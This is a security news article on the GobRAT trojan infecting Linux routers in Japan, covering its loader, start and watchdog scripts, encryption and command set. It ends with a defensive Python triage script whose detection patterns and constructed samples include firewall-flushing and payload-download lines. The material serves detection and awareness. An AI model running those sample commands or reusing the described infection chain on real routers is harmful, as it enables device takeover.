A new Golang-based RAT called GobRAT has been targeting Linux routers in Japan, possibly by exploiting known vulnerabilities. It is equipped with a wide range of capabilities and targets multiple architectures, including x86, x86-64, ARM, and MIPS.
The GobRAT operation
The JPCERT Coordination Center has published a report confirming that GobRAT has been infecting routers in Japan since February.
The attack begins with a scan for routers whose web UI (WEBUI) is exposed to the public internet.
The attackers then attempt intrusion, possibly by exploiting known vulnerabilities, and start the infection chain by executing several scripts.
The first is a Loader Script that disables the firewall, downloads GobRAT, and creates and executes additional scripts, including a Start Script and a Daemon Script.
The Start Script executes GobRAT, masquerading it as the Apache daemon process (apached). The Daemon Script ensures that the Start Script is running by checking its status every 20 seconds.
Deep dive into GobRAT
GobRAT is packed with the UPX v4 series packer and uses TLS to communicate with its command-and-control (C2) server.
Upon infection, it scans the infected machine to obtain its IP address and MAC address, total uptime, and network communication status.
Inside the binary, the C2 string and the Linux commands are stored encrypted; the malware decrypts them using AES-128 in CTR mode.
It supports 22 commands for various tasks, including obtaining machine information, reading and writing files, starting a SOCKS5 proxy, and executing a reverse shell.
It also attempts to log in to Telnet, SSHD, MySQL, Redis, and PostgreSQL services running on other machines across the network.
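To turn the infection chain and the packing detail above into something a defender can check for, the following is an added triage example (not code from the article or the JPCERT report) that applies heuristics for the Loader Script's firewall-disable and download steps, the Daemon Script's 20-second watchdog loop, the apached process name, and the UPX marker, run against constructed samples. Every pattern, path and sample value is an assumption modelled on the text, not a published indicator.

```python
import re

# Heuristics derived from the chain described above; assumptions, not JPCERT IoCs.
FIREWALL_OFF = re.compile(r"\b(iptables\s+-F\b|iptables\s+-P\s+\w+\s+ACCEPT\b|ufw\s+disable\b|firewalld\b)")
DOWNLOADER = re.compile(r"\b(wget|curl|tftp)\b")
WATCHDOG = re.compile(r"\bwhile\s+(true|:)\b.*?\bsleep\s+20\b", re.S)  # Daemon Script re-check interval
MASQUERADE = "apached"          # the fake Apache name the Start Script uses
UPX_MAGIC = b"UPX!"             # marker UPX leaves in the header area of a packed ELF


def script_indicators(text: str) -> set:
    """Return the names of Loader/Daemon-Script behaviours found in a shell script."""
    found = set()
    if FIREWALL_OFF.search(text):
        found.add("firewall_disabled")
    if DOWNLOADER.search(text):
        found.add("downloads_payload")
    if WATCHDOG.search(text):
        found.add("watchdog_loop")
    if MASQUERADE in text:
        found.add("apached_name")
    return found


def looks_upx_packed(data: bytes) -> bool:
    """True when an ELF image carries the UPX marker (as a packed GobRAT sample would)."""
    return data.startswith(b"\x7fELF") and UPX_MAGIC in data


def masquerading_pids(proc_table: list) -> list:
    """Flag processes whose comm is 'apached'. Real Apache daemons are httpd/apache2,
    so that name is an indicator on its own, whatever the exe path says."""
    return [pid for pid, comm, _exe in proc_table if comm == MASQUERADE]


# Constructed samples (not real GobRAT artefacts) showing each check firing.
SAMPLE_LOADER = 'iptables -F\nwget "$PAYLOAD_URL" -O /tmp/apached\nsh /tmp/start.sh\n'
SAMPLE_DAEMON = "while true; do pgrep -f start.sh >/dev/null || sh /tmp/start.sh; sleep 20; done\n"
SAMPLE_ELF = b"\x7fELF" + b"\x00" * 60 + b"UPX!" + b"\x00" * 32
SAMPLE_PROCS = [(1, "init", "/sbin/init"), (812, "apached", "/tmp/apached"), (900, "httpd", "/usr/sbin/httpd")]

if __name__ == "__main__":
    print(script_indicators(SAMPLE_LOADER))          # firewall off, download, apached name
    print(script_indicators(SAMPLE_DAEMON))          # watchdog loop
    print(looks_upx_packed(SAMPLE_ELF), masquerading_pids(SAMPLE_PROCS))
```

On a live router the same functions would be fed the contents of /proc/*/comm, the scripts found in the usual drop directories, and the bytes of any unexpected binary.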
Concluding thoughts
GobRAT is yet another Golang-based malware family targeting routers exposed to the internet. Leaving organizational assets exposed to the internet without proper security checks is an open invitation to GobRAT and the other threats scanning public and private address space. To stay secure, organizations should implement adequate proactive defenses, such as firewalls, and perform regular audits of their internet-facing infrastructure.